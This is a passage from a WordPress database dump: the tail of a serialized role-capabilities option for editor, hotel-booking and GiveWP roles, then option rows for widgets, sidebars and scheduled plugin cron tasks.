mphb_rooms\";b:1;s:17:\"delete_mphb_rooms\";b:1;s:25:\"delete_private_mphb_rooms\";b:1;s:24:\"delete_others_mphb_rooms\";b:1;s:27:\"delete_published_mphb_rooms\";b:1;s:15:\"read_mphb_rooms\";b:1;s:23:\"read_private_mphb_rooms\";b:1;s:18:\"publish_mphb_rooms\";b:1;s:18:\"edit_mphb_payments\";b:1;s:26:\"edit_private_mphb_payments\";b:1;s:25:\"edit_others_mphb_payments\";b:1;s:28:\"edit_published_mphb_payments\";b:1;s:20:\"delete_mphb_payments\";b:1;s:28:\"delete_private_mphb_payments\";b:1;s:27:\"delete_others_mphb_payments\";b:1;s:30:\"delete_published_mphb_payments\";b:1;s:18:\"read_mphb_payments\";b:1;s:26:\"read_private_mphb_payments\";b:1;s:21:\"publish_mphb_payments\";b:1;s:24:\"edit_mphb_reserved_rooms\";b:1;s:32:\"edit_private_mphb_reserved_rooms\";b:1;s:31:\"edit_others_mphb_reserved_rooms\";b:1;s:34:\"edit_published_mphb_reserved_rooms\";b:1;s:26:\"delete_mphb_reserved_rooms\";b:1;s:34:\"delete_private_mphb_reserved_rooms\";b:1;s:33:\"delete_others_mphb_reserved_rooms\";b:1;s:36:\"delete_published_mphb_reserved_rooms\";b:1;s:24:\"read_mphb_reserved_rooms\";b:1;s:32:\"read_private_mphb_reserved_rooms\";b:1;s:27:\"publish_mphb_reserved_rooms\";b:1;s:17:\"edit_mphb_coupons\";b:1;s:25:\"edit_private_mphb_coupons\";b:1;s:24:\"edit_others_mphb_coupons\";b:1;s:27:\"edit_published_mphb_coupons\";b:1;s:19:\"delete_mphb_coupons\";b:1;s:27:\"delete_private_mphb_coupons\";b:1;s:26:\"delete_others_mphb_coupons\";b:1;s:29:\"delete_published_mphb_coupons\";b:1;s:17:\"read_mphb_coupons\";b:1;s:25:\"read_private_mphb_coupons\";b:1;s:20:\"publish_mphb_coupons\";b:1;s:32:\"manage_mphb_room_type_categories\";b:1;s:26:\"manage_mphb_room_type_tags\";b:1;s:32:\"manage_mphb_room_type_facilities\";b:1;s:17:\"view_give_reports\";b:1;s:24:\"view_give_sensitive_data\";b:1;s:19:\"export_give_reports\";b:1;s:20:\"manage_give_settings\";b:1;s:18:\"view_give_payments\";b:1;s:15:\"edit_give_forms\";b:1;s:22:\"edit_others_give_forms\";b:1;s:18:\"publish_give_forms\";b:1;s:23:\"read_private_give_forms\";b:1;s:17:\"delete_give_forms\";b:1;s:25:\"delete_private_give_forms\";b:1;s:27:\"delete_published_give_forms\";b:1;s:24:\"delete_others_give_forms\";b:1;s:23:\"edit_private_give_forms\";b:1;s:25:\"edit_published_give_forms\";b:1;s:22:\"manage_give_form_terms\";b:1;s:20:\"edit_give_form_terms\";b:1;s:22:\"delete_give_form_terms\";b:1;s:22:\"assign_give_form_terms\";b:1;s:20:\"view_give_form_stats\";b:1;s:17:\"import_give_forms\";b:1;s:18:\"edit_give_payments\";b:1;s:25:\"edit_others_give_payments\";b:1;s:21:\"publish_give_payments\";b:1;s:26:\"read_private_give_payments\";b:1;s:20:\"delete_give_payments\";b:1;s:28:\"delete_private_give_payments\";b:1;s:30:\"delete_published_give_payments\";b:1;s:27:\"delete_others_give_payments\";b:1;s:26:\"edit_private_give_payments\";b:1;s:28:\"edit_published_give_payments\";b:1;s:25:\"manage_give_payment_terms\";b:1;s:23:\"edit_give_payment_terms\";b:1;s:25:\"delete_give_payment_terms\";b:1;s:25:\"assign_give_payment_terms\";b:1;s:23:\"view_give_payment_stats\";b:1;s:20:\"import_give_payments\";b:1;s:10:\"copy_posts\";b:1;s:27:\"fluentform_dashboard_access\";b:1;s:24:\"fluentform_forms_manager\";b:1;s:25:\"fluentform_entries_viewer\";b:1;s:25:\"fluentform_manage_entries\";b:1;s:24:\"fluentform_view_payments\";b:1;s:26:\"fluentform_manage_payments\";b:1;s:27:\"fluentform_settings_manager\";b:1;s:22:\"fluentform_full_access\";b:1;s:24:\"manage_user_registration\";b:1;s:22:\"edit_user_registration\";b:1;s:22:\"read_user_registration\";b:1;s:24:\"delete_user_registration\";b:1;s:23:\"edit_user_registrations\";b:1;s:30:\"edit_others_user_registrations\";b:1;s:26:\"publish_user_registrations\";b:1;s:31:\"read_private_user_registrations\";b:1;s:25:\"delete_user_registrations\";b:1;s:33:\"delete_private_user_registrations\";b:1;s:35:\"delete_published_user_registrations\";b:1;s:32:\"delete_others_user_registrations\";b:1;s:31:\"edit_private_user_registrations\";b:1;s:33:\"edit_published_user_registrations\";b:1;s:30:\"manage_user_registration_terms\";b:1;s:28:\"edit_user_registration_terms\";b:1;s:30:\"delete_user_registration_terms\";b:1;s:30:\"assign_user_registration_terms\";b:1;s:14:\"frm_view_forms\";b:1;s:14:\"frm_edit_forms\";b:1;s:16:\"frm_delete_forms\";b:1;s:19:\"frm_change_settings\";b:1;s:16:\"frm_view_entries\";b:1;s:18:\"frm_delete_entries\";b:1;s:31:\"vc_access_rules_post_types/post\";b:1;s:31:\"vc_access_rules_post_types/page\";b:1;s:39:\"vc_access_rules_post_types/dt_portfolio\";b:1;s:34:\"vc_access_rules_post_types/dt_team\";b:1;s:42:\"vc_access_rules_post_types/dt_testimonials\";b:1;s:39:\"vc_access_rules_post_types/dt_slideshow\";b:1;s:37:\"vc_access_rules_post_types/dt_gallery\";b:1;s:26:\"vc_access_rules_post_types\";s:6:\"custom\";}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:52:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:10:\"copy_posts\";b:1;s:31:\"vc_access_rules_post_types/post\";b:1;s:31:\"vc_access_rules_post_types/page\";b:1;s:39:\"vc_access_rules_post_types/dt_portfolio\";b:1;s:34:\"vc_access_rules_post_types/dt_team\";b:1;s:42:\"vc_access_rules_post_types/dt_testimonials\";b:1;s:39:\"vc_access_rules_post_types/dt_slideshow\";b:1;s:37:\"vc_access_rules_post_types/dt_gallery\";b:1;s:26:\"vc_access_rules_post_types\";s:6:\"custom\";s:30:\"vc_access_rules_backend_editor\";b:1;s:31:\"vc_access_rules_frontend_editor\";b:1;s:31:\"vc_access_rules_unfiltered_html\";b:1;s:29:\"vc_access_rules_post_settings\";b:1;s:25:\"vc_access_rules_templates\";b:1;s:26:\"vc_access_rules_shortcodes\";b:1;s:28:\"vc_access_rules_grid_builder\";b:1;s:23:\"vc_access_rules_presets\";b:1;s:25:\"vc_access_rules_dragndrop\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:20:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:26:\"vc_access_rules_post_types\";b:1;s:30:\"vc_access_rules_backend_editor\";b:1;s:31:\"vc_access_rules_frontend_editor\";b:1;s:31:\"vc_access_rules_unfiltered_html\";b:0;s:29:\"vc_access_rules_post_settings\";b:1;s:25:\"vc_access_rules_templates\";b:1;s:26:\"vc_access_rules_shortcodes\";b:1;s:28:\"vc_access_rules_grid_builder\";b:1;s:23:\"vc_access_rules_presets\";b:1;s:25:\"vc_access_rules_dragndrop\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:15:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:26:\"vc_access_rules_post_types\";b:1;s:30:\"vc_access_rules_backend_editor\";b:0;s:31:\"vc_access_rules_frontend_editor\";b:0;s:31:\"vc_access_rules_unfiltered_html\";b:0;s:29:\"vc_access_rules_post_settings\";b:1;s:25:\"vc_access_rules_templates\";b:1;s:26:\"vc_access_rules_shortcodes\";b:1;s:28:\"vc_access_rules_grid_builder\";b:0;s:23:\"vc_access_rules_presets\";b:1;s:25:\"vc_access_rules_dragndrop\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}s:12:\"mphb_manager\";a:2:{s:4:\"name\";s:13:\"Hotel Manager\";s:12:\"capabilities\";a:168:{s:20:\"mphb_manage_settings\";b:1;s:25:\"mphb_manage_booking_rules\";b:1;s:18:\"mphb_view_calendar\";b:1;s:26:\"mphb_manage_taxes_and_fees\";b:1;s:17:\"mphb_view_reports\";b:1;s:19:\"mphb_export_reports\";b:1;s:14:\"mphb_sync_ical\";b:1;s:16:\"mphb_import_ical\";b:1;s:19:\"mphb_view_customers\";b:1;s:18:\"mphb_edit_customer\";b:1;s:20:\"mphb_delete_customer\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:18:\"edit_mphb_bookings\";b:1;s:26:\"edit_private_mphb_bookings\";b:1;s:25:\"edit_others_mphb_bookings\";b:1;s:28:\"edit_published_mphb_bookings\";b:1;s:20:\"delete_mphb_bookings\";b:1;s:28:\"delete_private_mphb_bookings\";b:1;s:27:\"delete_others_mphb_bookings\";b:1;s:30:\"delete_published_mphb_bookings\";b:1;s:18:\"read_mphb_bookings\";b:1;s:26:\"read_private_mphb_bookings\";b:1;s:21:\"publish_mphb_bookings\";b:1;s:20:\"edit_mphb_room_types\";b:1;s:28:\"edit_private_mphb_room_types\";b:1;s:27:\"edit_others_mphb_room_types\";b:1;s:30:\"edit_published_mphb_room_types\";b:1;s:22:\"delete_mphb_room_types\";b:1;s:30:\"delete_private_mphb_room_types\";b:1;s:29:\"delete_others_mphb_room_types\";b:1;s:32:\"delete_published_mphb_room_types\";b:1;s:20:\"read_mphb_room_types\";b:1;s:28:\"read_private_mphb_room_types\";b:1;s:23:\"publish_mphb_room_types\";b:1;s:25:\"edit_mphb_room_attributes\";b:1;s:33:\"edit_private_mphb_room_attributes\";b:1;s:32:\"edit_others_mphb_room_attributes\";b:1;s:35:\"edit_published_mphb_room_attributes\";b:1;s:27:\"delete_mphb_room_attributes\";b:1;s:35:\"delete_private_mphb_room_attributes\";b:1;s:34:\"delete_others_mphb_room_attributes\";b:1;s:37:\"delete_published_mphb_room_attributes\";b:1;s:25:\"read_mphb_room_attributes\";b:1;s:33:\"read_private_mphb_room_attributes\";b:1;s:28:\"publish_mphb_room_attributes\";b:1;s:17:\"edit_mphb_seasons\";b:1;s:25:\"edit_private_mphb_seasons\";b:1;s:24:\"edit_others_mphb_seasons\";b:1;s:27:\"edit_published_mphb_seasons\";b:1;s:19:\"delete_mphb_seasons\";b:1;s:27:\"delete_private_mphb_seasons\";b:1;s:26:\"delete_others_mphb_seasons\";b:1;s:29:\"delete_published_mphb_seasons\";b:1;s:17:\"read_mphb_seasons\";b:1;s:25:\"read_private_mphb_seasons\";b:1;s:20:\"publish_mphb_seasons\";b:1;s:15:\"edit_mphb_rates\";b:1;s:23:\"edit_private_mphb_rates\";b:1;s:22:\"edit_others_mphb_rates\";b:1;s:25:\"edit_published_mphb_rates\";b:1;s:17:\"delete_mphb_rates\";b:1;s:25:\"delete_private_mphb_rates\";b:1;s:24:\"delete_others_mphb_rates\";b:1;s:27:\"delete_published_mphb_rates\";b:1;s:15:\"read_mphb_rates\";b:1;s:23:\"read_private_mphb_rates\";b:1;s:18:\"publish_mphb_rates\";b:1;s:23:\"edit_mphb_room_services\";b:1;s:31:\"edit_private_mphb_room_services\";b:1;s:30:\"edit_others_mphb_room_services\";b:1;s:33:\"edit_published_mphb_room_services\";b:1;s:25:\"delete_mphb_room_services\";b:1;s:33:\"delete_private_mphb_room_services\";b:1;s:32:\"delete_others_mphb_room_services\";b:1;s:35:\"delete_published_mphb_room_services\";b:1;s:23:\"read_mphb_room_services\";b:1;s:31:\"read_private_mphb_room_services\";b:1;s:26:\"publish_mphb_room_services\";b:1;s:15:\"edit_mphb_rooms\";b:1;s:23:\"edit_private_mphb_rooms\";b:1;s:22:\"edit_others_mphb_rooms\";b:1;s:25:\"edit_published_mphb_rooms\";b:1;s:17:\"delete_mphb_rooms\";b:1;s:25:\"delete_private_mphb_rooms\";b:1;s:24:\"delete_others_mphb_rooms\";b:1;s:27:\"delete_published_mphb_rooms\";b:1;s:15:\"read_mphb_rooms\";b:1;s:23:\"read_private_mphb_rooms\";b:1;s:18:\"publish_mphb_rooms\";b:1;s:18:\"edit_mphb_payments\";b:1;s:26:\"edit_private_mphb_payments\";b:1;s:25:\"edit_others_mphb_payments\";b:1;s:28:\"edit_published_mphb_payments\";b:1;s:20:\"delete_mphb_payments\";b:1;s:28:\"delete_private_mphb_payments\";b:1;s:27:\"delete_others_mphb_payments\";b:1;s:30:\"delete_published_mphb_payments\";b:1;s:18:\"read_mphb_payments\";b:1;s:26:\"read_private_mphb_payments\";b:1;s:21:\"publish_mphb_payments\";b:1;s:24:\"edit_mphb_reserved_rooms\";b:1;s:32:\"edit_private_mphb_reserved_rooms\";b:1;s:31:\"edit_others_mphb_reserved_rooms\";b:1;s:34:\"edit_published_mphb_reserved_rooms\";b:1;s:26:\"delete_mphb_reserved_rooms\";b:1;s:34:\"delete_private_mphb_reserved_rooms\";b:1;s:33:\"delete_others_mphb_reserved_rooms\";b:1;s:36:\"delete_published_mphb_reserved_rooms\";b:1;s:24:\"read_mphb_reserved_rooms\";b:1;s:32:\"read_private_mphb_reserved_rooms\";b:1;s:27:\"publish_mphb_reserved_rooms\";b:1;s:17:\"edit_mphb_coupons\";b:1;s:25:\"edit_private_mphb_coupons\";b:1;s:24:\"edit_others_mphb_coupons\";b:1;s:27:\"edit_published_mphb_coupons\";b:1;s:19:\"delete_mphb_coupons\";b:1;s:27:\"delete_private_mphb_coupons\";b:1;s:26:\"delete_others_mphb_coupons\";b:1;s:29:\"delete_published_mphb_coupons\";b:1;s:17:\"read_mphb_coupons\";b:1;s:25:\"read_private_mphb_coupons\";b:1;s:20:\"publish_mphb_coupons\";b:1;s:32:\"manage_mphb_room_type_categories\";b:1;s:26:\"manage_mphb_room_type_tags\";b:1;s:32:\"manage_mphb_room_type_facilities\";b:1;s:26:\"vc_access_rules_post_types\";b:1;s:30:\"vc_access_rules_backend_editor\";b:0;s:31:\"vc_access_rules_frontend_editor\";b:0;s:31:\"vc_access_rules_unfiltered_html\";b:1;s:29:\"vc_access_rules_post_settings\";b:1;s:25:\"vc_access_rules_templates\";b:1;s:26:\"vc_access_rules_shortcodes\";b:1;s:28:\"vc_access_rules_grid_builder\";b:0;s:23:\"vc_access_rules_presets\";b:1;s:25:\"vc_access_rules_dragndrop\";b:1;}}s:11:\"mphb_worker\";a:2:{s:4:\"name\";s:12:\"Hotel Worker\";s:12:\"capabilities\";a:3:{s:18:\"mphb_view_calendar\";b:1;s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}s:13:\"mphb_customer\";a:2:{s:4:\"name\";s:14:\"Hotel Customer\";s:12:\"capabilities\";a:0:{}}s:12:\"give_manager\";a:2:{s:4:\"name\";s:14:\"GiveWP Manager\";s:12:\"capabilities\";a:75:{s:4:\"read\";b:1;s:10:\"edit_posts\";b:1;s:12:\"delete_posts\";b:1;s:15:\"unfiltered_html\";b:1;s:12:\"upload_files\";b:1;s:6:\"export\";b:0;s:6:\"import\";b:0;s:19:\"delete_others_pages\";b:0;s:19:\"delete_others_posts\";b:0;s:12:\"delete_pages\";b:1;s:20:\"delete_private_pages\";b:1;s:20:\"delete_private_posts\";b:1;s:22:\"delete_published_pages\";b:1;s:22:\"delete_published_posts\";b:1;s:17:\"edit_others_pages\";b:0;s:17:\"edit_others_posts\";b:0;s:10:\"edit_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"edit_private_posts\";b:1;s:20:\"edit_published_pages\";b:1;s:20:\"edit_published_posts\";b:1;s:17:\"manage_categories\";b:0;s:12:\"manage_links\";b:1;s:17:\"moderate_comments\";b:1;s:13:\"publish_pages\";b:1;s:13:\"publish_posts\";b:1;s:18:\"read_private_pages\";b:1;s:18:\"read_private_posts\";b:1;s:17:\"view_give_reports\";b:1;s:24:\"view_give_sensitive_data\";b:1;s:19:\"export_give_reports\";b:1;s:20:\"manage_give_settings\";b:1;s:18:\"view_give_payments\";b:1;s:15:\"edit_give_forms\";b:1;s:22:\"edit_others_give_forms\";b:1;s:18:\"publish_give_forms\";b:1;s:23:\"read_private_give_forms\";b:1;s:17:\"delete_give_forms\";b:1;s:25:\"delete_private_give_forms\";b:1;s:27:\"delete_published_give_forms\";b:1;s:24:\"delete_others_give_forms\";b:1;s:23:\"edit_private_give_forms\";b:1;s:25:\"edit_published_give_forms\";b:1;s:22:\"manage_give_form_terms\";b:1;s:20:\"edit_give_form_terms\";b:1;s:22:\"delete_give_form_terms\";b:1;s:22:\"assign_give_form_terms\";b:1;s:20:\"view_give_form_stats\";b:1;s:17:\"import_give_forms\";b:1;s:18:\"edit_give_payments\";b:1;s:25:\"edit_others_give_payments\";b:1;s:21:\"publish_give_payments\";b:1;s:26:\"read_private_give_payments\";b:1;s:20:\"delete_give_payments\";b:1;s:28:\"delete_private_give_payments\";b:1;s:30:\"delete_published_give_payments\";b:1;s:27:\"delete_others_give_payments\";b:1;s:26:\"edit_private_give_payments\";b:1;s:28:\"edit_published_give_payments\";b:1;s:25:\"manage_give_payment_terms\";b:1;s:23:\"edit_give_payment_terms\";b:1;s:25:\"delete_give_payment_terms\";b:1;s:25:\"assign_give_payment_terms\";b:1;s:23:\"view_give_payment_stats\";b:1;s:20:\"import_give_payments\";b:1;s:26:\"vc_access_rules_post_types\";b:1;s:30:\"vc_access_rules_backend_editor\";b:0;s:31:\"vc_access_rules_frontend_editor\";b:0;s:31:\"vc_access_rules_unfiltered_html\";b:1;s:29:\"vc_access_rules_post_settings\";b:1;s:25:\"vc_access_rules_templates\";b:1;s:26:\"vc_access_rules_shortcodes\";b:1;s:28:\"vc_access_rules_grid_builder\";b:0;s:23:\"vc_access_rules_presets\";b:1;s:25:\"vc_access_rules_dragndrop\";b:1;}}s:15:\"give_accountant\";a:2:{s:4:\"name\";s:17:\"GiveWP Accountant\";s:12:\"capabilities\";a:9:{s:4:\"read\";b:1;s:10:\"edit_posts\";b:0;s:12:\"delete_posts\";b:0;s:15:\"edit_give_forms\";b:1;s:23:\"read_private_give_forms\";b:1;s:17:\"view_give_reports\";b:1;s:19:\"export_give_reports\";b:1;s:18:\"edit_give_payments\";b:1;s:18:\"view_give_payments\";b:1;}}s:11:\"give_worker\";a:2:{s:4:\"name\";s:13:\"GiveWP Worker\";s:12:\"capabilities\";a:33:{s:4:\"read\";b:1;s:10:\"edit_posts\";b:1;s:10:\"edit_pages\";b:1;s:12:\"upload_files\";b:1;s:12:\"delete_posts\";b:0;s:18:\"edit_give_payments\";b:1;s:17:\"delete_give_forms\";b:1;s:24:\"delete_others_give_forms\";b:1;s:25:\"delete_private_give_forms\";b:1;s:27:\"delete_published_give_forms\";b:1;s:15:\"edit_give_forms\";b:1;s:22:\"edit_others_give_forms\";b:1;s:23:\"edit_private_give_forms\";b:1;s:25:\"edit_published_give_forms\";b:1;s:18:\"publish_give_forms\";b:1;s:23:\"read_private_give_forms\";b:1;s:26:\"vc_access_rules_post_types\";s:6:\"custom\";s:30:\"vc_access_rules_backend_editor\";s:7:\"default\";s:31:\"vc_access_rules_frontend_editor\";b:1;s:31:\"vc_access_rules_unfiltered_html\";b:0;s:29:\"vc_access_rules_post_settings\";b:1;s:25:\"vc_access_rules_templates\";b:1;s:26:\"vc_access_rules_shortcodes\";b:1;s:28:\"vc_access_rules_grid_builder\";b:0;s:23:\"vc_access_rules_presets\";b:1;s:25:\"vc_access_rules_dragndrop\";b:1;s:31:\"vc_access_rules_post_types/post\";b:1;s:31:\"vc_access_rules_post_types/page\";b:1;s:39:\"vc_access_rules_post_types/dt_portfolio\";b:1;s:34:\"vc_access_rules_post_types/dt_team\";b:1;s:42:\"vc_access_rules_post_types/dt_testimonials\";b:1;s:39:\"vc_access_rules_post_types/dt_slideshow\";b:1;s:37:\"vc_access_rules_post_types/dt_gallery\";b:1;}}s:10:\"give_donor\";a:2:{s:4:\"name\";s:12:\"GiveWP Donor\";s:12:\"capabilities\";a:1:{s:4:\"read\";b:1;}}}','yes'),
(101,'fresh_site','0','yes'),
(102,'user_count','2','no'),
(103,'widget_block','a:6:{i:2;a:1:{s:7:\"content\";s:19:\"<!-- wp:search /-->\";}i:3;a:1:{s:7:\"content\";s:154:\"<!-- wp:group --><div class=\"wp-block-group\"><!-- wp:heading --><h2>Recent Posts</h2><!-- /wp:heading --><!-- wp:latest-posts /--></div><!-- /wp:group -->\";}i:4;a:1:{s:7:\"content\";s:227:\"<!-- wp:group --><div class=\"wp-block-group\"><!-- wp:heading --><h2>Recent Comments</h2><!-- /wp:heading --><!-- wp:latest-comments {\"displayAvatar\":false,\"displayDate\":false,\"displayExcerpt\":false} /--></div><!-- /wp:group -->\";}i:5;a:1:{s:7:\"content\";s:146:\"<!-- wp:group --><div class=\"wp-block-group\"><!-- wp:heading --><h2>Archives</h2><!-- /wp:heading --><!-- wp:archives /--></div><!-- /wp:group -->\";}i:6;a:1:{s:7:\"content\";s:150:\"<!-- wp:group --><div class=\"wp-block-group\"><!-- wp:heading --><h2>Categories</h2><!-- /wp:heading --><!-- wp:categories /--></div><!-- /wp:group -->\";}s:12:\"_multiwidget\";i:1;}','yes'),
(104,'sidebars_widgets','a:4:{s:19:\"wp_inactive_widgets\";a:11:{i:0;s:10:\"archives-2\";i:1;s:6:\"meta-2\";i:2;s:8:\"search-2\";i:3;s:12:\"categories-2\";i:4;s:14:\"recent-posts-2\";i:5;s:17:\"recent-comments-2\";i:6;s:7:\"block-2\";i:7;s:7:\"block-3\";i:8;s:7:\"block-4\";i:9;s:7:\"block-5\";i:10;s:7:\"block-6\";}s:9:\"sidebar_1\";a:3:{i:0;s:31:\"presscore-contact-form-widget-2\";i:1;s:21:\"presscore-portfolio-2\";i:2;s:21:\"presscore-portfolio-3\";}s:9:\"sidebar_2\";a:0:{}s:13:\"array_version\";i:3;}','yes'),
(105,'cron','a:17:{i:1698174527;a:1:{s:26:\"action_scheduler_run_queue\";a:1:{s:32:\"0d04ed39571b55704c122d726248bbac\";a:3:{s:8:\"schedule\";s:12:\"every_minute\";s:4:\"args\";a:1:{i:0;s:7:\"WP Cron\";}s:8:\"interval\";i:60;}}}i:1698174915;a:1:{s:34:\"wp_privacy_delete_old_export_files\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1698176179;a:1:{s:41:\"googlesitekit_cron_update_remote_features\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1698182666;a:4:{s:30:\"wp_site_health_scheduled_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}s:18:\"wp_https_detection\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1698182755;a:1:{s:32:\"recovery_mode_clean_expired_keys\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1698182779;a:4:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:25:\"delete_expired_transients\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:21:\"wp_update_user_counts\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1698183344;a:1:{s:28:\"elementor/tracker/send_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1698185086;a:1:{s:20:\"jetpack_v2_heartbeat\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1698185196;a:1:{s:24:\"jp_purge_transients_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1698186260;a:1:{s:27:\"give_daily_scheduled_events\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1698190447;a:1:{s:42:\"fluentform_do_email_report_scheduled_tasks\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1698202225;a:1:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1698208236;a:1:{s:30:\"the7_check_for_critical_alerts\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1698226686;a:1:{s:28:\"fs_data_sync_ultimate-blocks\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1698588122;a:1:{s:30:\"wp_delete_temp_updater_backups\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1698704660;a:1:{s:28:\"give_weekly_scheduled_events\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}s:7:\"version\";i:2;}','yes'),
